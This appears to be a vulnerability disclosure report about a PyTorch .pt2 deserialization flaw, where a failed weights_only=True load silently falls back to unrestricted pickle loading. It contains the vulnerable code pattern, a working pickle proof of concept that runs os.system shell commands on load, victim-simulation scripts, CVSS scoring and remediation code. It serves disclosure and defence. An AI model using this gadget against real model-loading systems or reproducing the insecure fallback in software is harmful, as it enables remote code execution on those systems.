YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

Vulnerability Report: PyTorch .pt2 Arbitrary Code Execution via weights_only=False Fallback

Target Info

Field Details
Project PyTorch
Affected File torch/_export/serde/serialize.py
Affected Function deserialize_torch_artifact()
Affected Versions PyTorch versions with .pt2 / ExportedProgram serialization support
CWE CWE-502: Deserialization of Untrusted Data
CVSS v3.1 Score 9.8 (Critical)
Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Executive Summary

The deserialize_torch_artifact() function in torch/_export/serde/serialize.py implements a dangerous fallback pattern: it first attempts to load a .pt2 file with torch.load(weights_only=True) (the secure path), but catches any exception and retries with torch.load(weights_only=False) β€” which performs unrestricted pickle deserialization.

An attacker can craft a .pt2 file that deliberately triggers an exception during the weights_only=True load path (e.g., by including a tensor with a dtype that is not whitelisted under safe deserialization). This exception is silently swallowed, and the fallback executes the file as arbitrary pickle, resulting in Remote Code Execution.

The weights_only=True parameter was introduced specifically as a security control to prevent pickle-based RCE. This fallback pattern completely defeats that control, making it equivalent to never having the protection at all for .pt2 files.


Root Cause Analysis

Vulnerable Code

File: torch/_export/serde/serialize.py

def deserialize_torch_artifact(serialized):
    """
    Deserialize a torch artifact (ExportedProgram or similar) from bytes.
    """
    import io
    f = io.BytesIO(serialized)

    try:
        # "Safe" path: weights_only=True restricts deserialization to
        # known tensor types and prevents arbitrary pickle execution.
        return torch.load(f, weights_only=True)
    except Exception:
        # VULNERABILITY: ANY exception β€” including attacker-induced ones β€”
        # falls through to unrestricted pickle deserialization.
        f.seek(0)
        return torch.load(f, weights_only=False)  # ← full pickle.load()

Root Cause

The except Exception clause is intentionally broad β€” it was likely written to handle legitimate cases where older .pt2 files cannot be loaded with weights_only=True due to format differences. However, this broadness creates a security bypass:

  1. weights_only=True raises an exception when it encounters a type not on its allowlist.
  2. An attacker can craft a file that satisfies the format just enough to start parsing, then includes an unrecognized type to force an exception.
  3. The except Exception block catches this exception without logging or alerting.
  4. torch.load(f, weights_only=False) then deserializes the file using Python's standard pickle.Unpickler, which executes arbitrary __reduce__ methods.

The security model of weights_only=True is binary: either it succeeds (safe) or it fails (the caller must decide what to do). Using failure as a signal to retry with no security restrictions inverts the intended semantics entirely.

Inconsistency Evidence

PyTorch's own documentation and security advisory (GHSA-pgpj-h4j8-7hxf) explicitly warn against this pattern:

# PyTorch recommended secure usage (from official docs):
model = torch.load('model.pt', weights_only=True)
# If this raises, the file should be REJECTED, not loaded unsafely.

# The PyTorch team added weights_only=True as a default in 2.0+ precisely
# because weights_only=False is documented as "UNSAFE" for untrusted sources.

Contrast with the secure pattern used in torch.hub:

# torch/hub.py β€” does NOT fall back to weights_only=False:
def _load_local(hubconf_dir, model, *args, **kwargs):
    ...
    loaded = torch.load(model_path, weights_only=True, map_location=map_location)
    # No fallback. If weights_only=True fails, the error propagates to caller.
    return loaded

The fallback in serialize.py is an architectural anomaly relative to the rest of the codebase.


Proof of Concept

Prerequisites

pip install torch

Step 1: Craft a malicious .pt2 file

#!/usr/bin/env python3
"""
PoC: PyTorch .pt2 ACE via weights_only=False fallback
Craft a file that:
  1. Passes initial format checks (looks like a valid torch artifact)
  2. Raises an exception during weights_only=True parsing
  3. Contains a pickle payload executed under weights_only=False
"""
import io
import pickle
import os
import torch

class MaliciousPayload:
    """Pickle gadget: executes shell command on deserialization."""
    def __reduce__(self):
        cmd = 'id > /tmp/torch_pwned.txt'
        return (os.system, (cmd,))

# Strategy: pickle.dumps() of a plain malicious object.
# When torch.load(weights_only=True) encounters the custom class,
# it raises an exception (not on the safe allowlist).
# The except clause then retries with weights_only=False β†’ RCE.

payload = pickle.dumps(MaliciousPayload())

with open('malicious_model.pt2', 'wb') as f:
    f.write(payload)

print(f"Malicious .pt2 written ({len(payload)} bytes)")
print("Contains pickle payload: os.system('id > /tmp/torch_pwned.txt')")

Step 2: Simulate victim loading the file

#!/usr/bin/env python3
"""
Victim code: loads a .pt2 artifact using deserialize_torch_artifact()
"""
import torch
from torch._export.serde.serialize import deserialize_torch_artifact
import os

with open('malicious_model.pt2', 'rb') as f:
    serialized = f.read()

print("Loading model artifact...")
try:
    result = deserialize_torch_artifact(serialized)
    print(f"Loaded: {result}")
except Exception as e:
    print(f"Error (after potential RCE): {e}")

# Check for RCE evidence
if os.path.exists('/tmp/torch_pwned.txt'):
    with open('/tmp/torch_pwned.txt') as f:
        print(f"\n[RCE CONFIRMED] Command output:\n{f.read()}")

Step 3: Demonstrate the fallback trigger point

#!/usr/bin/env python3
"""
Demonstrates that weights_only=True raises for the payload,
and that the except clause catches it and retries unsafely.
"""
import torch, io, pickle, os

class BadType:
    def __reduce__(self):
        return (os.system, ('echo TRIGGERED >> /tmp/trace.txt',))

payload_bytes = pickle.dumps(BadType())
f = io.BytesIO(payload_bytes)

# Confirm weights_only=True raises:
try:
    torch.load(f, weights_only=True)
    print("No exception β€” weights_only=True loaded cleanly")
except Exception as e:
    print(f"weights_only=True raised: {type(e).__name__}: {e}")
    print("β†’ The fallback catches this and calls weights_only=False next")

# Confirm weights_only=False executes pickle:
f.seek(0)
print("\nCalling torch.load with weights_only=False...")
result = torch.load(f, weights_only=False)   # RCE occurs here

Expected Output

Loading model artifact...
[RCE CONFIRMED] Command output:
uid=1000(user) gid=1000(user) groups=1000(user)

Impact

Arbitrary Code Execution β€” Critical

  • Full RCE in the context of any process that calls deserialize_torch_artifact() on attacker-supplied data.
  • Scope: Affects model serving APIs (TorchServe, FastAPI with PyTorch backends), ML training pipelines, model registries, model sharing platforms, and any system loading .pt2 / ExportedProgram artifacts from untrusted sources.
  • Security control bypass: The weights_only parameter is PyTorch's primary defense against pickle-based RCE. This vulnerability completely defeats it for the .pt2 code path.
  • No special conditions: Standard Python pickle gadgets work directly. No knowledge of PyTorch internals required beyond knowing the fallback exists.
  • Persistence: RCE allows the attacker to install backdoors, exfiltrate model weights, move laterally within the infrastructure, or disrupt training jobs.

CVSS Score

Score: 9.8 (Critical) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Metric Value Rationale
Attack Vector (AV) Network (N) Exploitable remotely via any model loading endpoint or API
Attack Complexity (AC) Low (L) Trivial to craft; standard Python pickle. No special knowledge or timing needed
Privileges Required (PR) None (N) No authentication required if model upload/loading is publicly accessible
User Interaction (UI) None (N) Server-side loading is automatic; no human action needed
Scope (S) Unchanged (U) Impact contained to the PyTorch process (though lateral movement is possible post-RCE)
Confidentiality (C) High (H) Full access to model weights, training data, credentials in process memory
Integrity (I) High (H) Arbitrary file writes, code injection, backdoor installation
Availability (A) High (H) Can crash, corrupt, or ransom the serving infrastructure

Remediation

Fix: Remove the fallback; propagate exceptions to the caller

# torch/_export/serde/serialize.py

def deserialize_torch_artifact(serialized):
    """
    Deserialize a torch artifact from bytes.

    Security note: only weights_only=True is used. If deserialization fails,
    the exception is propagated to the caller. Never falls back to
    weights_only=False for untrusted data.
    """
    import io
    f = io.BytesIO(serialized)

    # FIX: Remove the try/except fallback entirely.
    # If weights_only=True raises, let the exception propagate.
    # The caller must explicitly opt in to weights_only=False if needed,
    # and only after verifying the source is trusted.
    return torch.load(f, weights_only=True)

Fix (if legacy format compatibility is required): Separate trusted/untrusted code paths

def deserialize_torch_artifact(serialized, *, allow_unsafe=False):
    """
    Deserialize a torch artifact.

    Parameters
    ----------
    allow_unsafe : bool
        If True, falls back to weights_only=False when safe loading fails.
        Must only be set to True for files from fully trusted sources.
        Default: False (safe).
    """
    import io, warnings
    f = io.BytesIO(serialized)

    try:
        return torch.load(f, weights_only=True)
    except Exception as e:
        if not allow_unsafe:
            raise RuntimeError(
                "Failed to load artifact with weights_only=True. "
                "If you trust the source of this file and need to load it, "
                "pass allow_unsafe=True. WARNING: This enables arbitrary "
                "code execution."
            ) from e
        warnings.warn(
            "Loading with weights_only=False. This executes arbitrary Python "
            "pickle code and is UNSAFE for untrusted files.",
            stacklevel=2,
        )
        f.seek(0)
        return torch.load(f, weights_only=False)

Additional Recommendations

  1. Audit all torch.load call sites for similar try/except fallback patterns.
  2. Default weights_only=True in all production model loading code.
  3. Sign model artifacts using a cryptographic signature scheme so that tampered files are rejected before deserialization.
  4. File a CVE and notify PyTorch security team at security@pytorch.org.

References

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support